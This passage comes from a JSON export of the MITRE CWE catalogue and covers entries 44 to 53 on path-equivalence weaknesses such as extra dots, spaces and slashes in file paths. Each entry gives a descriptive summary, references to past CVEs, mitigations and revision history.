Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Dot - \'file.ordir\'","attr":{"@_Date":"2008-04-11"}}}},"45":{"attr":{"@_ID":"45","@_Name":"Path Equivalence: \'file...name\' (Multiple Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal dot (\'file...dir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"44","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Dot - \'file...dir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Dot - \'file...dir\'","attr":{"@_Date":"2008-04-11"}}}},"46":{"attr":{"@_ID":"46","@_Name":"Path Equivalence: \'filename \' (Trailing Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing space (\'filedir \') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2004-2213","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Space - \'filedir \'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"649"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Space - \'filedir \'","attr":{"@_Date":"2008-04-11"}}}},"47":{"attr":{"@_ID":"47","@_Name":"Path Equivalence: \' filename\' (Leading Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of leading space (\' filedir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Space - \' filedir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Path Issue - Leading Space - \' filedir\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \' filename (Leading Space)","attr":{"@_Date":"2010-09-27"}}]}},"48":{"attr":{"@_ID":"48","@_Name":"Path Equivalence: \'file name\' (Internal Whitespace)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal space (\'file(SPACE)name\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"file(SPACE)name (internal space)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":[{"#text":"This weakness is likely to overlap quoting problems, e.g. the \\"Program Files\\" unquoted search path (CWE-428). It also could be an equivalence issue if filtering removes all extraneous spaces.","attr":{"@_Type":"Relationship"}},{"#text":"Whitespace can be a factor in other weaknesses not directly related to equivalence. It can also be used to spoof icons or hide files with dangerous names (see icon manipulation and visual truncation in CWE-451).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Space - file(SPACE)name","attr":{"@_Date":"2008-04-11"}}}},"49":{"attr":{"@_ID":"49","@_Name":"Path Equivalence: \'filename/\' (Trailing Slash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing slash (\'filedir/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir/ (trailing slash, trailing /)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Slash - filedir/","attr":{"@_Date":"2008-04-11"}}}},"50":{"attr":{"@_ID":"50","@_Name":"Path Equivalence: \'//multiple/leading/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple leading slash (\'//multiple/leading/slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"161","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"//multiple/leading/slash (\'multiple leading slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Leading Slash - //multiple/leading/slash","attr":{"@_Date":"2008-04-11"}}}},"51":{"attr":{"@_ID":"51","@_Name":"Path Equivalence: \'/multiple//internal/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal slash (\'/multiple//internal/slash/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple//internal/slash (\'multiple internal slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Slash - /multiple//internal/slash","attr":{"@_Date":"2008-04-11"}}}},"52":{"attr":{"@_ID":"52","@_Name":"Path Equivalence: \'/multiple/trailing/slash//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing slash (\'/multiple/trailing/slash//\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple/trailing/slash// (\'multiple trailing slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Slash - /multiple/trailing/slash//","attr":{"@_Date":"2008-04-11"}}}},"53":{"attr":{"@_ID":"53","@_Name":"Path Equivalence: \'\\\\multiple\\\\\\\\internal\\\\backslash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal backslash 